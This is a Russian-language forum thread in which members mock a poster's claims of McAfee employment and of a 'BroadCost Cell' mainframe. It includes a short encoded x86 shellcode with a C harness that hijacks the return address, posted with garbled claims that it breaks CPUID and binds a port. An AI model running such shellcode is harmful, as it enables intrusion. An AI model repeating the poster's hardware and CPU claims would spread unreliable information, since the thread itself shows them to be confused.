# демонстрация ЦП багов вживую

Satsura,
Вы тут писали, что работаете в MacAfee:
http://www.linux.uz/forum/index.php/topic,2049.msg27196.html#msg27196

Это правда? Может оба в Казахстан приедете? Один спец(Касперский) хорошо, а два еще лучше.

 

>>Всё это круто. Но почему у вас мыло на ксакепе ?
- Ну это одна из почт В основном ей пользуюсь, т.к она на удобном двиге GMAIL работает. А так их много вообщет. Есче вот этим чаще всего пользуюсь последнее время:
administration@inbox.uz, satsura@inj3ct0r.com[работает крайне не стабильно из-за ДДОС'а со стороны спецслужб, но тоже очень очень классная панель управления там] sanjar@buxoro.uz, d34dm4st3rs@yandex.ru, etc%)

>>Вы тут писали, что работаете в MacAfee:
http://www.linux.uz/forum/index.php/topic,2049.msg27196.html#msg27196
>>Это правда? Может оба в Казахстан приедете? Один спец(Касперский) хорошо, а два еще лучше.
- Вообщет пишется McAfee. Да работаю. Удаленка. Работаю чисто из за спортивного интереса. Тут с тоже Адоб второй раз предложили работу (На этот раз менеджер их официально вышел с предложением.)... Вот... так... думаю... Может свалить.... Хотя таких ребят как я компании[корпорации] типа Adobe , Microsoft, IBM[etc] проводят через соковыжималку[выжимают сок идей и возможностей] а потом выкидывают как ненужный жмыхъъъ((( Вот так вот ребята...
А Узб. у нас пока есче дикий. необъезжанный рынок. основная масса софта (98%) - нелегальная, прокрэченная.Если есть мозги даже здесь есть возможность нормально развернуться
--------
Насчет поездки ничего не могу сказать. Времени чисто не хватает даже чтобы нормально поесть. Обед, Ужин - возле компа и проходит... Последнее время работаю в режиме глубокого хачанья (18-20ч/24ч). Так что без обид.

 

the true story?

 

>> Один спец(Касперский) хорошо, а два еще лучше.
- А да есче chop, Крис не любит когда путают его псевдоним с Дядей Женей.
Он Крис Касперски, а не Касперский.

>>the true story?
- типо троль?...

 

На песикиежь похоже. Кортинка к месту.

 

dfrsa. Так ли это ?))
Почта работает. Просто бывают сбои. Раньше такая проблема и на Xakep.RU отмечалась
Я просто сказал то что есть. Частенько с 21:00 до 4:00 (а то и больше SMTP сервер этого ресурса отказывается работать). Об этом можно спросить украинского паренька, (a.k.a inj3ct0r) админа ресурса(где хостится сайты inj3ct0r.com, 0xr00t.com)
Зы.:Могу отправить без проблем с него тестовое письмо или показать фэйс ясчика

Зы.ЗЫ.: Я вот что заметил, на этом форуме когда ты начинаешь рассказывать подробно о своих делах и жизни как таковой, тебя начинают тролить, причем по любому поводу.
Хотя мне не обидно. Я понимаю что так должно быть. Криса ведь тоже тролят, да и Clerk'a...
Так вот уважаемые товарисчи, пишите все что хотите, ибо человеку вставший на путь Дзена мне узже нет до этого никакого дела... На сих Satsura заворачивается и больше никогда не посмеет потревожить ваш взор своими тупыми рассказами.

-----------
S4(uR4 нарываясь на красноглазие почти дохачил Darwin'a под Sparc чтобы предствить его миру.... И тут его сбили с мысли...
И на последок самая мощная фраза из 101 Дзенской истории : Так ли это господа?

 

Бред. И как эти левые домыслы связаны с:

Вы переврали самого себя

 

dfrsa, зачем далеко ходить ?)) достаточно спросить у админа этого ресурса почему до него невсегда доходят письма и услышите мой ответ.

>>Вы переврали самого себя
- Ну ну. Вам виднее.

 

А куда делись еще 52 "BroadCost Cell" CPU? Тут http://wasm.ru/forum/viewtopic.php?pid=389323#p389323 ты чесал про 112 процов. Кстати, просвети, а что за "Broadcost Cell" CPU? Тупой гугль о таком CPU не знает. Бред малолетнего дрочера? Тьфу, я имел в виду - Секретная Разработка Служб Безопасности?

 

Satsura

Дзена у аверов нет.

 

Clerk
> Дзена у аверов нет.
я уважаю вашу точку зрения. у вас есть вера. не у всех она есть. вот у меня ее нет и мне все равно под каким флагом махать мечом и что на этом флаге написано. я просто точу ништяки, ковыряюсь в коде, общаюсь с пиплами, что в теме и получаю от этого удовольствие. у меня нет ни белой и темной стороны, потому что в мире вообще нет ни добра, ни зла, а есть только разные религии и после того как я узнал, что по понятиям дзена буддисту нельзя есть мсяо, я понял, что я ни хвоста не буддист, хотя с буддистами общаюсь регулярно. как по мылу, так и в живую. и чем больше я с ними общаюсь, тем меньше тянет на дзен.

 

зачетная.
на фоне надо еще БредКост СРУ нарисовать.

PS Satsura, если вы такой специалист некислый, хачающий глубокие режимы по 20 часов в сутке, да еще и дзен-буддист, откуда у вас время на саморекламу в у*бищных соц. сетях и на форумы (дело ведь далеко не только пространными постами на васм.ру ограничивается) ?

и даже тут дело не тока во времени, а в простейшей логике ?

зачем устоявшемуся и проявившему себя специалисту (макаффи, службы безопасносте, вон даже манагеры с адоба лично приглашают -- стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ? (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)

вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?

 

Guru_of_Zen
> PS Satsura, если вы такой специалист некислый, хачающий
> глубокие режимы по 20 часов в сутке, да еще и дзен-буддист,
> откуда у вас время на саморекламу в у*бищных соц. сетях
хоть вопрос и не ко мне, но я все-таки отвечу. точнее спрошу. а откуда у _вас_ время на такое кол-во вопросов не по существу? давно бы уже достали и померялись...

> и даже тут дело не тока во времени, а в простейшей логике ?
не ищите везде логики, а то ведь можете и до суицида дойти, поняв, что логики нет. кстати, я вот только вчера суицидом занимался. было интересно -- а что же буде _там_ ?! а там в общем-то ничего интересного нет... просто мыщъх проснулся. но я хронически путаю сон с явью, а во сне суицид совешал уже неоднократно, когда был совершенно уверен, что это ни разу не сон.

> зачем устоявшемуся и проявившему себя специалисту (макаффи,
работа на макаффи ни о чем не говорит. как и работа на гугла или ms. ну то есть говорит конечно, что кого-то взяли, а кого-то нет, но это в общем-то дело случая. я вот в mcafee попал совершенно случайно.

> службы безопасносте, вон даже манагеры с адоба лично приглашают
вы просто не в курсе в чем обязаннось манагеров. она как раз в этом и состоит. чем им еще заниматься?! я вот тоже с CTO/SVP свободно общаюсь, а мой VP мой лучший друг. ну и что?

> стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ?
> (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)
как-то вы нервно на пиар реагируете. расслабтесь.

> вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?
я вот, кстати, не в курсе кто пиарит себя. а вы в курсе мне оно фиолетово. а вам нет

 

-----

 

>>А куда делись еще 52 "BroadCost Cell" CPU? Тут http://wasm.ru/forum/viewtopic.php?pid=389323#p389323 ты чесал про 112 процов. Кстати, просвети, а что за "Broadcost Cell" CPU? Тупой гугль о таком CPU не знает. Бред малолетнего дрочера? Тьфу, я имел в виду - Секретная Разработка Служб Безопасности?

- medstrax1, вот держите : http://www.google.co.uz/search?hl=r...A&ved=0CBEQvgUoAA&q=BroadCost+Cell+CPU&nfpr=1
А насчет куда делись есче 52 CPU могу ответь скромно : У мну в Бухаре стоит средняя реализация этого майнфрейма.[Без Parallels GPU, CrossFade синхронизаторов, и т.д. Но зато RAID-5 :p]. Самый мощный стоит в Центре научных и исследовательских разработок (НИИРУз). на нем как раз и стоит полный боекомплект.

>>Дзена у аверов нет.

- Clerk, я уже не впервый раз говорю что я не авер. Я и не вексер. Моя есть - реверс инженер.[в простонародье кодокопатель,хакер]. Дзен понятие относительное. Согласитесь назвать Дзен религией или верой это как то не правильно. Тем более для нас , людей постсоветского пространства. Для меня понятие Дзен - Свобода мысли. Свовода информации. Свобода слова. [Be Cool! Be Free!] Все что вам и нам так не хватает(я неговорю уже о том что наши государства неуклонно повторяют о том что у нас с вами демократическое государство. Хотя на практике оказывается наоборот) из-за комплексов или угроз со стороны общества. Боязнь проявить себя , извените меня это никакой ни Дзен. Вот и здесь меня стараются тролить по любому поводу, думая что могут задеть мои чувства. Посмею их разочаровать, т.к я уже на троллинг никак неведусь. ;p



>>скорее всего "BroadCast Cell" имелось ввиду,
IBM разработки на PowerPC
что то типа этого http://en.wikipedia.org/wiki/Cell_(microprocessor)

- Да. спасибо за разъяснение. Я это и имел ввиду. Скажу больше архитектура CPU которая используется в наших майнфреймах -это ничто иное как выдернутые CPU из PS3[Play Station3].
Предугадаю вопрос большинства: почему же все таки Cell ? а не Itanium, Sparc, или i7 ?
Ответ прост. Хотя и компания Intel так мощно разрекламировалa свой процессор Intel i7(сказали что это самый мощный процессор в мире!), на самом деле оно таковым не является. Самый мощный и стабильный процессор в мире это BroadCost Cell. Архитектура Cell позволяет расширять возможности процессора не только на физическом , но и на программном уровне Тем более новый компилятор CellGCC позволяет максимизировать эффективность написаного софта, а собранные библиотеки Glibc, CellSTI, etc... позволяют на лету (прозрачным JIT) обрабатывать многомиллионные запросы в сотнях, тысячах потоках, да же без средств GPU

>>да.. сатсура тот еще крис в профеле
- Спасибо за комплемент.

>>PS Satsura, если вы такой специалист некислый, хачающий глубокие режимы по 20 часов в сутке, да еще и дзен-буддист, откуда у вас время на саморекламу в у*бищных соц. сетях и на форумы (дело ведь далеко не только пространными постами на васм.ру ограничивается) ?

и даже тут дело не тока во времени, а в простейшей логике ?

зачем устоявшемуся и проявившему себя специалисту (макаффи, службы безопасносте, вон даже манагеры с адоба лично приглашают -- стало быть, цель достигнуто ?) -- рекламировать себя на соц. сетях ? (вы даже как-то надысть всем советовали, мол пиар и тока пиар, особенно на линкедИн.)

вопщем где логика, где смысл (анекдот про вовочку думаю знаете ? ) ?

- Во первых когда я сказал что хачу по 20 ч в сутки я иммел виду полезное просиживание за компом 18-20 ч. (иногда бывает конечно меньше по 14-16 ч, но это так проблема из за так называемых передвижений в простанстве (в 4-D режиме))
Во вторых LinkedIn не "у*бищная " соц. сеть. В ней куча профессионалов, с которыми есть о чем поговорить, подделиться с мыслями, научиться уму-разуму (чего и вам советую кстати). Есть также группы в которые по желанию можно вступить , впоследствии можно также задавать вопросы на большую часть из которых вы можете получить разнообразные ответы(часть которых вам поможет в разрешении той или иной проблемы).
LinkedIn дает большие возможности, начиная с карьерного роста(пиара, и т.д и т.п) и заканчивая большим разворотом в крупных компаниях, которые с удовольствием могут вам предоставить оборудование, и т.д и т.п для различных исследований, разработок... Если вы действительно умный и вы не боитесь поделить мыслями с миром, если вам быстро надо найти союзников и мощных Если вы действительно умный и вы не боитесь поделить мыслями с миром то добро пожаловать на LinkedIN.
Зы.: Цели и желания человека безграничны. Главное в этой жизни иметь возможность и небояться их релизовать.
2 ALL : Be Cool! Be Free!

У мну все. Всем удачи.

--------------------

Крис, как продвижения идут ? Вы обесчали но так и не ответили на то письмо)

 

Satsura
> Крис, как продвижения идут ? Вы обесчали но так и не ответили на то письмо)
два zero-days подряд. три бессонные ночи... отвечу сегодня как проснусь. а щас мыщъх спать...

 

А какой смысл меряться органами с пиз...болом? Я понимаю, имеет смысл меряться с клерком, но с этим чудом... Все, что он пишет на поверку оказывается полной ахинеей. Вот неплохой экземплярчик http://forum.reverse4you.org/showthread.php?t=529.
Позволю себе цитату

Может товарищ сацура просветит своих недалеких оппонентов, что же есть в его понимании "CPUID регистр". А что такое "супернеуязвимые суперрегистры"? Не стесняйся, повесели нас.

 

>>А какой смысл меряться органами с пиз...болом? Я понимаю, имеет смысл меряться с клерком, но с этим чудом... Все, что он пишет на поверку оказывается полной ахинеей. Вот неплохой экземплярчик http://forum.reverse4you.org/showthread.php?t=529.

medstrax1, а ты этот сплойт пробовал на вкус ?

Код (Text):

1. char shellcode[] =
2.  
3.     "\x31\xc0"              // xor %eax,%eax
4.     "\x0f\xa2"              // cpuid
5.     "\x51"                  // push %ecx
6.     "\x68\xe7\x95\xa8\xec"  // push $0xeca895e7
7.     "\x68\xde\x7f\x37\x3f"  // push $0x3f377fde
8.     "\x68\x07\x1a\xec\x8f"  // push $0x8fec1a07
9.     "\x68\x6e\x1c\x4a\x0e"  // push $0x0e4a1c6e
10.     "\x68\x06\x5b\x16\x04"  // push $0x04165b06
11.  
12.     //
13.     // <_unpack_loop>:
14.     //
15.  
16.     "\x31\x0c\x24"          // xor %ecx,(%esp)
17.     "\x5a"                  // pop %edx
18.     "\x75\xfa"              // jne <_unpack_loop>
19.     "\x83\xec\x18"          // sub $0x18,%esp
20.     "\x54"                  // push %esp
21.     "\xc3";                 // ret
22.  
23. int main(int argc, char **argv) {
24.     int *ret;
25.     ret = (int *)&ret + 2;
26.     (*ret) = (int) shellcode;
27. }

Я вот попробовал (тестил: Gentoo, Slackware 12.0, BackTrack2.0), так вот процессору сносит башню причем прилично. Лично на моем стареньком Intel Extreme(3,00) кроме бинда порта происходили непонятные , но весьма заманчивые действия с регистром CPUID, вместо получения информации о CPU , я получил в исполнениемые данные находящихся за пределами стека Пример продемонстрирован и опробован ребятами того форума который вы привели нам.

А вам слабо хотя бы такой ресерч произвести ?)

>>пиз...болом
- В следуюсчий раз получишь набор ножей абсолютно бесплатно

>>Может товарищ сацура просветит своих недалеких оппонентов, что же есть в его понимании "CPUID регистр". А что такое "супернеуязвимые суперрегистры"? Не стесняйся, повесели нас.
- Обкуритесь, повода для веселья будет больше

Зы.: Честно сказать , я не люблю оглядываться назад. Все что когдато было, все что я когда писал приносило удовольствие не только мне , но и другим (посмотрите сколько я выложил постов на их форуме, и сколько раз и кто меня поблагодарил).
Недавно низкоуровнево форматнул винт со своими старыми сорсами и статьями. Они меня уже больше не интересуют. Ибо сейчас я живу в совершенно в другом мире , да и окружение у меня заметно изменилось.
2ALL : Пишите по существу, а именно по теме. Тошно уже вам на ваши оутпостные коменты отвечать. Крис приедет в Узб. У нас как раз будет возможность с ним поговорить, заснимем все это дело на камеру, да и разместим все эти дела для общества форума WASM. Потом вот и поговорим кто гонит, что гонит, когда гонит и как гонит
Зы.: Если вам не дала жена, у вас проблемы в университете, вам мало платят или вас не берут на работу, может проблема вас , а не в окружающих?) Хватит писать garbage. И да если хотите померяться, укажу правильный вам путь - форум.античат.ру

Зы.:Если хотите поговорить или возникли вопросы пишите в личку. Я лично могу разъяснить, показать все что я вам говорил, демонстрировал

 

TermoSINteZ, спасибо большое. учту на будующее.
TermoSINteZ, McAfee с Intel вроде какую то тусовку намечает на март 2011 вы не в курсе?) Вас случаем не приглашали никуда?)